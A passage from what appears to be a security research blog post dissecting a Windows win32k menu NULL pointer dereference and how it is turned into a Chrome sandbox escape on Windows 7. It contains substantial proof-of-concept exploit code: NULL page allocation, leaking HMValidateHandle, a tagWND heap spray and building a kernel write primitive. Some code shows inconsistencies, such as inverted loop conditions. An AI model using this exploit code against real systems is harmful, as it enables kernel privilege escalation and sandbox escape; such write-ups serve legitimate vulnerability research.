Once the hook exits, hWndMain‘s window procedure is executed. However, since the window procedure for the hWndMain window was changed to SubMenuProc(), SubMenuProc() is executed instead of the expected DefWindowProc() function.

SubMenuProc() will first check if the incoming message is of type WM_MN_FINDMENUWINDOWFROMPOINT. If it is, SubMenuProc() will call SetWindowLongPtr() to set the window procedure for hWndMain back to DefWindowProc() so that hWndMain can handle any additional incoming window messages. This will prevent the application becoming unresponsive. SubMenuProc() will then return hWndFakeMenu, or the handle to the window that was created using the menu class string.

LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
    if (msg == WM_MN_FINDMENUWINDOWFROMPOINT)
    {
        SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc);
        return (ULONG)hWndFakeMenu;
    }
    return DefWindowProc(hwnd, msg, wParam, lParam);
}

Since hWndFakeMenu is a valid window handle it will pass the HMValidateHandle() check. However, as mentioned previously, many of the window’s elements will be set to 0 or NULL as CreateWindowEx() tried to create a window as a menu without sufficient information. Execution will subsequently proceed from xxxMNFindWindowFromPoint() to xxxMNUpdateDraggingInfo(), which will perform a call to MNGetpItem(), which will in turn call MNGetpItemFromIndex().

MNGetpItemFromIndex() will then try to access offsets within hWndFakeMenu‘s spMenu field. However since hWndFakeMenu‘s spMenu field is set to NULL, this will result in a NULL pointer dereference, and a kernel crash if the NULL page has not been allocated.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
  tagITEM *result; // eax

  if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ){ // NULL pointer dereference will occur 
                                                           // here if spMenu is NULL.
    result = 0;
  else
    result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
  return result;
}

Sandbox Limitations

To better understand how to escape Chrome’s sandbox, it is important to understand how it operates. Most of the important details of the Chrome sandbox are explained on Google’s Sandbox page. Reading this page reveals several important details about the Chrome sandbox which are relevant to this exploit. These are listed below:

  • All processes in the Chrome sandbox run at Low Integrity.
  • A restrictive job object is applied to the process token of all the processes running in the Chrome sandbox. This prevents the spawning of child processes, amongst other things.
  • Processes running in the Chrome sandbox run in an isolated desktop, separate from the main desktop and the service desktop to prevent Shatter attacks that could result in privilege escalation.
  • On Windows 8 and higher the Chrome sandbox prevents calls to win32k.sys.

The first protection in this list is that processes running inside the sandbox run with Low integrity. Running at Low integrity prevents attackers from being able to exploit a number of kernel leaks mentioned on sam-b’s kernel leak page, as starting with Windows 8.1, most of these leaks require that the process be running with Medium integrity or higher. This limitation is bypassed in the exploit by abusing a well known memory leak in the implementation of HMValidateHandle() on Windows versions prior to Windows 10 RS4, and is discussed in more detail later in the blog.

The next limitation is the restricted job object and token that are placed on the sandboxed process. The restricted token ensures that the sandboxed process runs without any permissions, whilst the job object ensures that the sandboxed process cannot spawn any child processes. The combination of these two mitigations means that to escape the sandbox the attacker will likely have to create their own process token or steal another process token, and then subsequently disassociate the job object from that token. Given the permissions this requires, this most likely will require a kernel level vulnerability. These two mitigations are the most relevant to the exploit; their bypasses are discussed in more detail later on in this blog.

The job object additionally ensures that the sandboxed process uses what Google calls the “alternate desktop” (known in Windows terminology as the “limited desktop”), which is a desktop separate from the main user desktop and the service desktop, to prevent potential privilege escalations via window messages. This is done because Windows prevents window messages from being sent between desktops, which restricts the attacker to only sending window messages to windows that are created within the sandbox itself. Thankfully this particular exploit only requires interaction with windows created within the sandbox, so this mitigation only really has the effect of making it so that the end user can’t see any of the windows and menus the exploit creates.

Finally it’s worth noting that whilst protections were introduced in Windows 8 to allow Chrome to prevent sandboxed applications from making syscalls to win32k.sys, these controls were not backported to Windows 7. As a result Chrome’s sandbox does not have the ability to prevent calls to win32k.sys on Windows 7 and prior, which means that attackers can abuse vulnerabilities within win32k.sys to escape the Chrome sandbox on these versions of Windows.

Sandbox Exploit Explanation

Creating a DLL for the Chrome Sandbox

As is explained in James Forshaw’s In-Console-Able blog post, it is not possible to inject just any DLL into the Chrome sandbox. Due to sandbox limitations, the DLL has to be created in such a way that it does not load any other libraries or manifest files.

To achieve this, the Visual Studio project for the PoC exploit was first adjusted so that the project type would be set to a DLL instead of an EXE. After this, the C++ compiler settings were changed to tell it to use the multi-threaded runtime library (not a multithreaded DLL). Finally the linker settings were changed to instruct Visual Studio not to generate manifest files.

Once this was done, Visual Studio was able to produce DLLs that could be loaded into the Chrome sandbox via a vulnerability such as István Kurucsai’s 1Day Chrome vulnerability, CVE-2019-5786 (which was detailed in a previous blog post), or via DLL injection with a program such as this one.

Explanation of the Existing Limited Write Primitive

Before diving into the details of how the exploit was converted into a sandbox escape, it is important to understand the limited write primitive that this exploit grants an attacker should they successfully set up the NULL page, as this provides the basis for the discussion that occurs throughout the following sections.

Once the vulnerability has been triggered, xxxMNUpdateDraggingInfo() will be called in win32k.sys. If the NULL page has been set up correctly, then xxxMNUpdateDraggingInfo() will call xxxMNSetGapState(), whose code is shown below:

void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
{
  ...
          var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write 
                                                         // operation should occur, minus an 
                                                         // offset of 0x4.
          temp_var_PITEM = var_PITEM;
          if ( var_PITEM )
          {
            ...
            var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the 
                                                         // address where the second write operation 
                                                         // should occur, minus an offset of 0x4. This 
                                                         // address will be 0x6C bytes earlier in 
                                                         // memory than the address in var_PITEM.
            if ( fSet )
            {
              *((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the 
                                                             // attacker controlled address.
              if ( var_PITEM_Minus_Offset_Of_0x6C )
              {
                *((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u; 
                                                    // Conduct the second write to the attacker
                                                    // controlled address minus 0x68 (0x6C-0x4).
...

xxxMNSetGapState() performs two write operations to an attacker controlled location plus an offset of 4. The only difference between the two write operations is that 0x40000000 is written to an address located 0x6C bytes earlier than the address where the 0x80000000 write is conducted.

It is also important to note is that the writes are conducted using OR operations. This means that the attacker can only add bits to the DWORD they choose to write to; it is not possible to remove or alter bits that are already there. It is also important to note that even if an attacker starts their write at some offset, they will still only be able to write the value \x40 or \x80 to an address at best.

From these observations it becomes apparent that the attacker will require a more powerful write primitive if they wish to escape the Chrome sandbox. To meet this requirement, Exodus Intelligence’s exploit utilizes the limited write primitive to create a more powerful write primitive by abusing tagWND objects. The details of how this is done, along with the steps required to escape the sandbox, are explained in more detail in the following sections.

Allocating the NULL Page

On Windows versions prior to Windows 8, it is possible to allocate memory in the NULL page from userland by calling NtAllocateVirtualMemory(). Within the PoC code, the main() function was adjusted to obtain the address of NtAllocateVirtualMemory() from ntdll.dll and save it into the variable pfnNtAllocateVirtualMemory.

Once this is done, allocateNullPage() is called to allocate the NULL page itself, using address 0x1, with read, write, and execute permissions. The address 0x1 will then then rounded down to 0x0 by NtAllocateVirtualMemory() to fit on a page boundary, thereby allowing the attacker to allocate memory at 0x0.

typedef NTSTATUS(WINAPI *NTAllocateVirtualMemory)(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG ZeroBits,
	PULONG AllocationSize,
	ULONG AllocationType,
	ULONG Protect
);
NTAllocateVirtualMemory pfnNtAllocateVirtualMemory = 0;
....
pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
....
// Thanks to https://github.com/YeonExp/HEVD/blob/c19ad75ceab65cff07233a72e2e765be866fd636/NullPointerDereference/NullPointerDereference/main.cpp#L56 for
// explaining this in an example along with the finer details that are often forgotten.
bool allocateNullPage() {
	/* Set the base address at which the memory will be allocated to 0x1.
	This is done since a value of 0x0 will not be accepted by NtAllocateVirtualMemory,
	however due to page alignment requirements the 0x1 will be rounded down to 0x0 internally.*/
	PVOID BaseAddress = (PVOID)0x1;

	/* Set the size to be allocated to 40960 to ensure that there
	   is plenty of memory allocated and available for use. */
	SIZE_T size = 40960;

	/* Call NtAllocateVirtualMemory to allocate the virtual memory at address 0x0 with the size
	specified in the variable size. Also make sure the memory is allocated with read, write,
	and execute permissions.*/
	NTSTATUS result = pfnNtAllocateVirtualMemory(GetCurrentProcess(), &BaseAddress, 0x0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);

	// If the call to NtAllocateVirtualMemory failed, return FALSE.
	if (result != 0x0) {
		return FALSE;
	}

	// If the code reaches this point, then everything went well, so return TRUE.
	return TRUE;
}

Finding the Address of HMValidateHandle

Once the NULL page has been allocated the exploit will then obtain the address of the HMValidateHandle() function. HMValidateHandle() is useful for attackers as it allows them to obtain a userland copy of any object provided that they have a handle. Additionally this leak also works at Low Integrity on Windows versions prior to Windows 10 RS4.

By abusing this functionality to copy objects which contain a pointer to their location in kernel memory, such as tagWND (the window object), into user mode memory, an attacker can leak the addresses of various objects simply by obtaining a handle to them.

As the address of HMValidateHandle() is not exported from user32.dll, an attacker cannot directly obtain the address of HMValidateHandle() via user32.dll‘s export table. Instead, the attacker must find another function that user32.dll exports which calls HMValidateHandle(), read the value of the offset within the indirect jump, and then perform some math to calculate the true address of HMValidateHandle().

This is done by obtaining the address of the exported function IsMenu() from user32.dll and then searching for the first instance of the byte \xEB within IsMenu()‘s code, which signals the start of an indirect call to HMValidateHandle(). By then performing some math on the base address of user32.dll, the relative offset in the indirect call, and the offset of IsMenu() from the start of user32.dll, the attacker can obtain the address of HMValidateHandle(). This can be seen in the following code.

HMODULE hUser32 = LoadLibraryW(L"user32.dll");
LoadLibraryW(L"gdi32.dll");

// Find the address of HMValidateHandle using the address of user32.dll
if (findHMValidateHandleAddress(hUser32) == FALSE) {
    printf("[!] Couldn't locate the address of HMValidateHandle!\r\n");
    ExitProcess(-1);
}
...
BOOL findHMValidateHandleAddress(HMODULE hUser32) {
	// The address of the function HMValidateHandleAddress() is not exported to
	// the public. However the function IsMenu() contains a call to HMValidateHandle()
	// within it after some short setup code. The call starts with the byte \xEB.

	// Obtain the address of the function IsMenu() from user32.dll.
	BYTE * pIsMenuFunction = (BYTE *)GetProcAddress(hUser32, "IsMenu");
	if (pIsMenuFunction == NULL) {
		printf("[!] Failed to find the address of IsMenu within user32.dll.\r\n");
		return FALSE;
	}
	else {
		printf("[*] pIsMenuFunction: 0x%08X\r\n", pIsMenuFunction);
	}

	// Search for the location of the \xEB byte within the IsMenu() function
	// to find the start of the indirect call to HMValidateHandle().
	unsigned int offsetInIsMenuFunction = 0;
	BOOL foundHMValidateHandleAddress = FALSE;
	for (unsigned int i = 0; i > 0x1000; i++) {
		BYTE* pCurrentByte = pIsMenuFunction + i;
		if (*pCurrentByte == 0xE8) {
			offsetInIsMenuFunction = i + 1;
			break;
		}
	}

	// Throw error and exit if the \xE8 byte couldn't be located.
	if (offsetInIsMenuFunction == 0) {
		printf("[!] Couldn't find offset to HMValidateHandle within IsMenu.\r\n");
		return FALSE;
	}

	// Output address of user32.dll in memory for debugging purposes.
	printf("[*] hUser32: 0x%08X\r\n", hUser32);

	// Get the value of the relative address being called within the IsMenu() function.
	unsigned int relativeAddressBeingCalledInIsMenu = *(unsigned int *)(pIsMenuFunction + offsetInIsMenuFunction);
	printf("[*] relativeAddressBeingCalledInIsMenu: 0x%08X\r\n", relativeAddressBeingCalledInIsMenu);

	// Find out how far the IsMenu() function is located from the base address of user32.dll.
	unsigned int addressOfIsMenuFromStartOfUser32 = ((unsigned int)pIsMenuFunction - (unsigned int)hUser32);
	printf("[*] addressOfIsMenuFromStartOfUser32: 0x%08X\r\n", addressOfIsMenuFromStartOfUser32);

	// Take this offset and add to it the relative address used in the call to HMValidateHandle().
	// Result should be the offset of HMValidateHandle() from the start of user32.dll.
	unsigned int offset = addressOfIsMenuFromStartOfUser32 + relativeAddressBeingCalledInIsMenu;
	printf("[*] offset: 0x%08X\r\n", offset);

	// Skip over 11 bytes since on Windows 10 these are not NOPs and it would be
	// ideal if this code could be reused in the future.
	pHmValidateHandle = (lHMValidateHandle)((unsigned int)hUser32 + offset + 11);
	printf("[*] pHmValidateHandle: 0x%08X\r\n", pHmValidateHandle);
	return TRUE;
}

Creating a Arbitrary Kernel Address Write Primitive with Window Objects

Once the address of HMValidateHandle() has been obtained, the exploit will call the sprayWindows() function. The first thing that sprayWindows() does is register a new window class named sprayWindowClass using RegisterClassExW(). The sprayWindowClass will also be set up such that any windows created with this class will use the attacker defined window procedure sprayCallback().

A HWND table named hwndSprayHandleTable will then be created, and a loop will be conducted which will call CreateWindowExW() to create 0x100 tagWND objects of class sprayWindowClass and save their handles into the hwndSprayHandle table. Once this spray is complete, two loops will be used, one nested inside the other, to obtain a userland copy of each of the tagWND objects using HMValidateHandle().

The kernel address for each of these tagWND objects is then obtained by examining the tagWND objects’ pSelf field. The kernel address of each of the tagWND objects are compared with one another until two tagWND objects are found that are less than 0x3FD00 apart in kernel memory, at which point the loops are terminated.

/* The following definitions define the various structures
   needed within sprayWindows() */
typedef struct _HEAD
{
	HANDLE h;
	DWORD  cLockObj;
} HEAD, *PHEAD;

typedef struct _THROBJHEAD
{
	HEAD h;
	PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;

typedef struct _THRDESKHEAD
{
	THROBJHEAD h;
	PVOID    rpdesk;
	PVOID    pSelf;   // points to the kernel mode address of the object
} THRDESKHEAD, *PTHRDESKHEAD;
....
// Spray the windows and find two that are less than 0x3fd00 apart in memory.
if (sprayWindows() == FALSE) {
	printf("[!] Couldn't find two tagWND objects less than 0x3fd00 apart in memory after the spray!\r\n");
	ExitProcess(-1);
}
....
// Define the HMValidateHandle window type TYPE_WINDOW appropriately.
#define TYPE_WINDOW 1

/* Main function for spraying the tagWND objects into memory and finding two
   that are less than 0x3fd00 apart */
bool sprayWindows() {
	HWND hwndSprayHandleTable[0x100]; // Create a table to hold 0x100 HWND handles created by the spray.

	// Create and set up the window class for the sprayed window objects.
	WNDCLASSEXW sprayClass = { 0 };
	sprayClass.cbSize = sizeof(WNDCLASSEXW);
	sprayClass.lpszClassName = TEXT("sprayWindowClass");
	sprayClass.lpfnWndProc = sprayCallback; // Set the window procedure for the sprayed 
                                          // window objects to sprayCallback().

	if (RegisterClassExW(&sprayClass) == 0) {
		printf("[!] Couldn't register the sprayClass class!\r\n");
	}

	// Create 0x100 windows using the sprayClass window class with the window name "spray".
	for (int i = 0; i < 0x100; i++) {
		hwndSprayHandleTable[i] = CreateWindowExW(0, sprayClass.lpszClassName, TEXT("spray"), 0, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
	}

	// For each entry in the hwndSprayHandle table...
	for (int x = 0; x < 0x100; x++) {
		// Leak the kernel address of the current HWND being examined, save it into firstEntryAddress.
		THRDESKHEAD *firstEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[x], TYPE_WINDOW);
		unsigned int firstEntryAddress = (unsigned int)firstEntryDesktop->pSelf;

		// Then start a loop to start comparing the kernel address of this hWND
		// object to the kernel address of every other hWND object...
		for (int y = 0; y < 0x100; y++) {
			if (x != y) { // Skip over one instance of the loop if the entries being compared are
                    // at the same offset in the hwndSprayHandleTable

				// Leak the kernel address of the second hWND object being used in 
        // the comparison, save it into secondEntryAddress.
				THRDESKHEAD *secondEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[y], TYPE_WINDOW);
				unsigned int secondEntryAddress = (unsigned int)secondEntryDesktop->pSelf;

				// If the kernel address of the hWND object leaked earlier in the code is greater than
				// the kernel address of the hWND object leaked above, execute the following code.
				if (firstEntryAddress > secondEntryAddress) {

					// Check if the difference between the two addresses is less than 0x3fd00.
					if ((firstEntryAddress - secondEntryAddress) < 0x3fd00) {
						printf("[*] Primary window address: 0x%08X\r\n", secondEntryAddress);
						printf("[*] Secondary window address: 0x%08X\r\n", firstEntryAddress);

						// Save the handle of secondEntryAddress into hPrimaryWindow 
            // and its address into primaryWindowAddress.
						hPrimaryWindow = hwndSprayHandleTable[y];
						primaryWindowAddress = secondEntryAddress;

						// Save the handle of firstEntryAddress into hSecondaryWindow 
            // and its address into secondaryWindowAddress.
						hSecondaryWindow = hwndSprayHandleTable[x];
						secondaryWindowAddress = firstEntryAddress;

						// Windows have been found, escape the loop.
						break;
					}
				}

				// If the kernel address of the hWND object leaked earlier in the code is less than
				// the kernel address of the hWND object leaked above, execute the following code.
				else {

					// Check if the difference between the two addresses is less than 0x3fd00.
					if ((secondEntryAddress - firstEntryAddress) < 0x3fd00) {
						printf("[*] Primary window address: 0x%08X\r\n", firstEntryAddress);
						printf("[*] Secondary window address: 0x%08X\r\n", secondEntryAddress);

						// Save the handle of firstEntryAddress into hPrimaryWindow 
            // and its address into primaryWindowAddress.
						hPrimaryWindow = hwndSprayHandleTable[x];
						primaryWindowAddress = firstEntryAddress;

						// Save the handle of secondEntryAddress into hSecondaryWindow 
            // and its address into secondaryWindowAddress.
						hSecondaryWindow = hwndSprayHandleTable[y];
						secondaryWindowAddress = secondEntryAddress;

						// Windows have been found, escape the loop.
						break;
					}
				}
			}
		}

		// Check if the inner loop ended and the windows were found. If so print a debug message.
		// Otherwise continue on to the next object in the hwndSprayTable array.
		if (hPrimaryWindow != NULL) {
			printf("[*] Found target windows!\r\n");
			break;
		}
	}

Once two tagWND objects matching these requirements are found, their addresses will be compared to see which one is located earlier in memory. The tagWND object located earlier in memory will become the primary window; its address will be saved into the global variable primaryWindowAddress, whilst its handle will be saved into the global variable hPrimaryWindow. The other tagWND object will become the secondary window; its address is saved into secondaryWindowAddress and its handle is saved into hSecondaryWindow.

Once the addresses of these windows have been saved, the handles to the other windows within hwndSprayHandle are destroyed using DestroyWindow() in order to release resources back to the host operating system.

// Check that hPrimaryWindow isn't NULL after both the loops are
// complete. This will only occur in the event that none of the 0x1000
// window objects were within 0x3fd00 bytes of each other. If this occurs, then bail.
if (hPrimaryWindow == NULL) {
	printf("[!] Couldn't find the right windows for the tagWND primitive. Exiting....\r\n");
	return FALSE;
}

// This loop will destroy the handles to all other
// windows besides hPrimaryWindow and hSecondaryWindow,
// thereby ensuring that there are no lingering unused
// handles wasting system resources.
for (int p = 0; p > 0x100; p++) {
	HWND temp = hwndSprayHandleTable[p];
	if ((temp != hPrimaryWindow) && (temp != hSecondaryWindow)) {
		DestroyWindow(temp);
	}
}

addressToWrite = (UINT)primaryWindowAddress + 0x90; // Set addressToWrite to
                                                    // primaryWindow's cbwndExtra field.

printf("[*] Destroyed spare windows!\r\n");

// Check if its possible to set the window text in hSecondaryWindow.
// If this isn't possible, there is a serious error, and the program should exit.
// Otherwise return TRUE as everything has been set up correctly.
if (SetWindowTextW(hSecondaryWindow, L"test String") == 0) {
	printf("[!] Something is wrong, couldn't initialize the text buffer in the secondary window....\r\n");
	return FALSE;
}
else {
	return TRUE;
}

The final part of sprayWindows() sets addressToWrite to the address of the cbwndExtra field within primaryWindowAddress in order to let the exploit know where the limited write primitive should write the value 0x40000000 to.

To understand why tagWND objects where sprayed and why the cbwndExtra and strName.Buffer fields of a tagWND object are important, it is necessary to examine a well known kernel write primitive that exists on Windows versions prior to Windows 10 RS1.

As is explained in Saif Sheri and Ian Kronquist’s The Life & Death of Kernel Object Abuse paper and Morten Schenk’s Taking Windows 10 Kernel Exploitation to The Next Level presentation, if one can place two tagWND objects together in memory one after another and then edit the cbwndExtra field of the tagWND object located earlier in memory via a kernel write vulnerability, they can extend the expected length of the former tagWND’s WndExtra data field such that it thinks it controls memory that is actually controlled by the second tagWND object.

The following diagram shows how the exploit utilizes this concept to set the cbwndExtra field of hPrimaryWindow to 0x40000000 by utilizing the limited write primitive that was explained earlier in this blog post, as well as how this adjustment allows the attacker to set data inside the second tagWND object that is located adjacent to it.

Effects of adjusting the cbwndExtra field in hPrimaryWindow

Once the cbwndExtra field of the first tagWND object has been overwritten, if an attacker calls SetWindowLong() on the first tagWND object, an attacker can overwrite the strName.Buffer field in the second tagWND object and set it to an arbitrary address. When SetWindowText() is called using the second tagWND object, the address contained in the overwritten strName.Buffer field will be used as destination address for the write operation.

By forming this stronger write primitive, the attacker can write controllable values to kernel addresses, which is a prerequisite to breaking out of the Chrome sandbox. The following listing from WinDBG shows the fields of the tagWND object which are relevant to this technique.

1: kd> dt -r1 win32k!tagWND
   +0x000 head             : _THRDESKHEAD
      +0x000 h                : Ptr32 Void
      +0x004 cLockObj         : Uint4B
      +0x008 pti              : Ptr32 tagTHREADINFO
      +0x00c rpdesk           : Ptr32 tagDESKTOP
      +0x010 pSelf            : Ptr32 UChar
   ...
   +0x084 strName          : _LARGE_UNICODE_STRING
      +0x000 Length           : Uint4B
      +0x004 MaximumLength    : Pos 0, 31 Bits
      +0x004 bAnsi            : Pos 31, 1 Bit
      +0x008 Buffer           : Ptr32 Uint2B
   +0x090 cbwndExtra       : Int4B
   ...      

Leaking the Address of pPopupMenu for Write Address Calculations

Before continuing, lets reexamine how MNGetpItemFromIndex(), which returns the address to be written to, minus an offset of 0x4, operates. Recall that the decompiled version of this function is as follows.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
tagITEM *result; // eax

if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur here if spMenu is NULL.
   result = 0;
else
   result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
return result;
}

Notice that on line 8 there are two components which make up the final address which is returned. These are pPopupMenu, which is multiplied by 0x6C, and spMenu->rgItems, which will point to offset 0x34 in the NULL page. Without the ability to determine the values of both of these items, the attacker will not be able to fully control what address is returned by MNGetpItemFromIndex(), and henceforth which address xxxMNSetGapState() writes to in memory.

There is a solution for this however, which can be observed by viewing the updates made to the code for SubMenuProc(). The updated code takes the wParam parameter and adds 0x10 to it to obtain the value of pPopupMenu. This is then used to set the value of the variable addressToWriteTo which is used to set the value of spMenu->rgItems within MNGetpItemFromIndex() so that it returns the correct address for xxxMNSetGapState() to write to.

LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
	if (msg == WM_MN_FINDMENUWINDOWFROMPOINT){
		printf("[*] In WM_MN_FINDMENUWINDOWFROMPOINT handler...\r\n");
		printf("[*] Restoring window procedure...\r\n");
		SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc);

		/* The wParam parameter here has the same value as pPopupMenu inside MNGetpItemFromIndex,
		   except wParam has been subtracted by minus 0x10. Code adjusts this below to accommodate.

		   This is an important information leak as without this the attacker
		   cannot manipulate the values returned from MNGetpItemFromIndex, which
		   can result in kernel crashes and a dramatic decrease in exploit reliability.
		*/
		UINT pPopupAddressInCalculations = wParam + 0x10;

		// Set the address to write to to be the right bit of cbwndExtra in the target tagWND.
		UINT addressToWriteTo = ((addressToWrite + 0x6C) - ((pPopupAddressInCalculations * 0x6C) + 0x4));

To understand why this code works, it is necessary to reexamine the code for xxxMNFindWindowFromPoint(). Note that the address of pPopupMenu is sent by xxxMNFindWindowFromPoint() in the wParam parameter when it calls xxxSendMessage() to send a MN_FINDMENUWINDOWFROMPOINT message to the application’s main window. This allows the attacker to obtain the address of pPopupMenu by implementing a handler for MN_FINDMENUWINDOWFROMPOINT which saves the wParam parameter’s value into a local variable for later use.

LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
{
....
    v6 = xxxSendMessage(
           var_pPopupMenu->spwndNextPopup,
           MN_FINDMENUWINDOWFROMPOINT,
           (WPARAM)&pPopupMenu,
           (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the 
                                      // MN_FINDMENUWINDOWFROMPOINT usermode callback
                                      // using the address of pPopupMenu as the 
                                      // wParam argument.
    ThreadUnlock1();
    if ( IsMFMWFPWindow(v6) )  // Validate the handle returned from the user
                               // mode callback is a handle to a MFMWFP window.
      v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned 
                                                                        // handle is a handle to 
                                                                        // a window object. Set v1 to
                                                                        // TRUE if all is good.
      ...

During experiments, it was found that the value sent via xxxSendMessage() is 0x10 less than the value used in MNGetpItemFromIndex(). For this reason, the exploit code adds 0x10 to the value returned from xxxSendMessage() to ensure it the value of pPopupMenu in the exploit code matches the value used inside MNGetpItemFromIndex().

Setting up the Memory in the NULL Page

Once addressToWriteTo has been calculated, the NULL page is set up. In order to set up the NULL page appropriately the following offsets need to be filled out:

  • 0x20
  • 0x34
  • 0x4C
  • 0x50 to 0x1050

This can be seen in more detail in the following diagram.

NULL page utilization

The exploit code starts by setting offset 0x20 in the NULL page to 0xFFFFFFFF. This is done as spMenu will be NULL at this point, so spMenu->cItems will contain the value at offset 0x20 of the NULL page. Setting the value at this address to a large unsigned integer will ensure that spMenu->cItems is greater than the value of pPopupMenu, which will prevent MNGetpItemFromIndex() from returning 0 instead of result. This can be seen on line 5 of the following code.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
tagITEM *result; // eax

if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur 
                                                        // here if spMenu is NULL.
    result = 0;
else
    result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
return result;
}

Offset 0x34 of the NULL page will contain a DWORD which holds the value of spMenu->rgItems. This will be set to the value of addressToWriteTo so that the calculation shown on line 8 will set result to the address of primaryWindow‘s cbwndExtra field, minus an offset of 0x4.

The other offsets require a more detailed explanation. The following code shows the code within the function xxxMNUpdateDraggingInfo() which utilizes these offsets.

.text:BF975EA3                 mov     eax, [ebx+14h]  ; EAX = ppopupmenu->spmenu
.text:BF975EA3                                         ;
.text:BF975EA3                                         ; Should set EAX to 0 or NULL.
.text:BF975EA6                 push    dword ptr [eax+4Ch] ; uIndex aka pPopupMenu. This will be the 
.text:BF975EA6                                             ; value at address 0x4C given that
.text:BF975EA6                                             ; ppopupmenu->spmenu is NULL.
.text:BF975EA9                 push    eax             ; spMenu. Will be NULL or 0.
.text:BF975EAA                 call    MNGetpItemFromIndex
..............
.text:BF975EBA                 add     ecx, [eax+28h]  ; ECX += pItemFromIndex->yItem
.text:BF975EBA                                         ;
.text:BF975EBA                                         ; pItemFromIndex->yItem will be the value
.text:BF975EBA                                         ; at offset 0x28 of whatever value
.text:BF975EBA                                         ; MNGetpItemFromIndex returns.
...............
.text:BF975ECE                 cmp     ecx, ebx
.text:BF975ED0                 jg      short loc_BF975EDB ; Jump to loc_BF975EDB if the following 
.text:BF975ED0                                            ; condition is true:
.text:BF975ED0                                            ;
.text:BF975ED0                                            ; ((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))

As can be seen above, a call will be made to MNGetpItemFromIndex() using two parameters: spMenu which will be set to a value of NULL, and uIndex, which will contain the DWORD at offset 0x4C of the NULL page. The value returned by MNGetpItemFromIndex() will then be incremented by 0x28 before being used as a pointer to a DWORD. The DWORD at the resulting address will then be used to set pItemFromIndex->yItem, which will be utilized in a calculation to determine whether a jump should be taken. The exploit needs to ensure that this jump is always taken as it ensures that xxxMNSetGapState() goes about writing to addressToWrite in a consistent manner.

To ensure this jump is taken, the exploit sets the value at offset 0x4C in such a way that MNGetpItemFromIndex() will always return a value within the range 0x120 to 0x180. By then setting the bytes at offset 0x50 to 0x1050 within the NULL page to 0xF0 the attacker can ensure that regardless of the value that MNGetpItemFromIndex() returns, when it is incremented by 0x28 and used as a pointer to a DWORD it will result in pItemFromIndex->yItem being set to 0xF0F0F0F0. This will cause the first half of the following calculation to always be a very large unsigned integer, and henceforth the jump will always be taken.

((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))

Forming a Stronger Write Primitive by Using the Limited Write Primitive

Once the NULL page has been set up, SubMenuProc() will return hWndFakeMenu to xxxSendMessage() in xxxMNFindWindowFromPoint(), where execution will continue.

memset((void *)0x50, 0xF0, 0x1000);

return (ULONG)hWndFakeMenu;

After the xxxSendMessage() call, xxxMNFindWindowFromPoint() will call HMValidateHandleNoSecure() to ensure that hWndFakeMenu is a handle to a window object. This code can be seen below.

v6 = xxxSendMessage(
var_pPopupMenu->spwndNextPopup,
MN_FINDMENUWINDOWFROMPOINT,
(WPARAM)&pPopupMenu,
(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the 
                                      // MN_FINDMENUWINDOWFROMPOINT usermode callback
                                      // using the address of pPopupMenu as the 
                                      // wParam argument.
ThreadUnlock1();
if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user
                          // mode callback is a handle to a MFMWFP window.
v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned handle 
                                                                  // is a handle to a window object. 
                                                                  // Set v1 to TRUE if all is good.

If hWndFakeMenu is deemed to be a valid handle to a window object, then xxxMNSetGapState() will be executed, which will set the cbwndExtra field in primaryWindow to 0x40000000, as shown below. This will allow SetWindowLong() calls that operate on primaryWindow to set values beyond the normal boundaries of primaryWindow‘s WndExtra data field, thereby allowing primaryWindow to make controlled writes to data within secondaryWindow.

void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
{
  ...
          var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write 
